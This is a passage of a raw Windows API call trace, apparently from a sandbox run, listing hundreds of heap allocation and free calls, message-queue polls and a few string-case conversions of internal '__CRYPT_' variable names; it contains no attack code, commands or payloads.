0x2e54e28 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0132.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0132.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0132.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.352] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0132.352] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0132.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0132.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0132.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0132.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0132.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0132.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0132.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0132.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0132.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0132.354] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0132.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0132.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.367] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.368] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0132.368] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0132.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0132.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0132.368] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0132.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0132.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0132.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0132.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0132.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0132.369] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0132.369] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0132.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0132.369] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0132.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0132.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0132.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0132.369] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.370] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0132.370] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0132.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0132.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0132.370] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0132.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0132.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0132.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0132.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0132.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0132.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0132.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0132.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0132.372] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0132.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0132.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0132.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0132.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0132.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0132.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0132.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0132.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0132.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0132.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0132.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0132.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0132.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0132.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1309) returned 0x2f49960 [0132.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f49960 | out: hHeap=0x970000) returned 1 [0132.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0132.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0132.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0132.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0132.377] RtlAllocateHeap (HeapHandle=0x970000, 